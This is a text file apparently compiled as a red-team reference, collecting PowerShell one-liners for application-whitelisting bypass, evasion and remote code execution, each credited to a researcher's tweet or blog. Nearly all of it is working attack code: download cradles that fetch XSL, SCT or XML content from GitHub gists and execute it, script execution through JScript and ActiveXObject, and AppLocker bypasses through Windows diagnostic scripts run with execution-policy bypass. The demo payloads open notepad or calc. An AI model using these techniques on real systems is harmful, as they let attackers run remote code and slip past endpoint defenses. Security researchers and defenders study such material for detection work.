Snippets of PowerShell bypass/evasion/execution techniques that are interesting

PowerShell.txt

##############################################################################
### Powershell Xml/Xsl Assembly "Fetch & Execute"
### [https://twitter.com/bohops/status/966172175555284992]

$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;

##############################################################################
### Powershell VBScript Assembly SCT "Fetch & Execute"
### [https://twitter.com/bohops/status/965670898379476993]

[Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://gist.githubusercontent.com/bohops/72031fecb0f58531753f51d4ef2b86e9/raw/805dcca541e6b5efa1420e8758eaea9c3487dcf0/notepad.sct').Exec(0)

##############################################################################
### Powershell JScript Assembly SCT "Fetch & Execute"
### [https://twitter.com/bohops/status/965085651199840258]

[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://gist.githubusercontent.com/bohops/72031fecb0f58531753f51d4ef2b86e9/raw/805dcca541e6b5efa1420e8758eaea9c3487dcf0/notepad.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())

##############################################################################
### Powershell JScript Assembly ActiveXObject Script Execution
### [@gabemarshall - https://gist.githubusercontent.com/gabemarshall/a708aad5b70a31d0bec19b86a1b73c28/raw/44e74c465b5585dc7a941103aa8742b928933ccf/jscript.ps1]

[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');$js = 'var js = new ActiveXObject("WScript.Shell");js.Run("calc");'[Microsoft.JScript.Eval]::JScriptEvaluate($js,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine());

##############################################################################
### Loading .Net/C# Assemblies to Bypass AppLocker Default Rules w/ PowerShell Diagnostic Scripts
### [https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/]

powershell -v 2 -ep bypass
cd C:\windows\diagnostics\system\AERO
import-module .\CL_LoadAssembly.ps1
LoadAssemblyFromPath ..\..\..\..\path\assembly.exe
[name.space]::executesomething()

##############################################################################
### Command Invocation w/ PowerShell Diagnostic Scripts
### [https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/]

powershell -v 2 -ep bypass
cd C:\windows\diagnostics\system\AERO
import-module CL_Invocation.ps1
SyncInvoke notepad.exe

##############################################################################
### PowerShell CL Download Cradle
### [@subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d]
### [@HarmJ0y - https://gist.github.com/HarmJ0y/bb48307ffa663256e239]

$a = New-Object System.Xml.XmlDocument
$a.Load("https://gist.githubusercontent.com/bohops/0e7f900bba16181f01575bdd43b383e9/raw/1d4913d032903f0aa9d8e9ab62891745ee814043/notepad.xml")
$a.command.a.execute | iex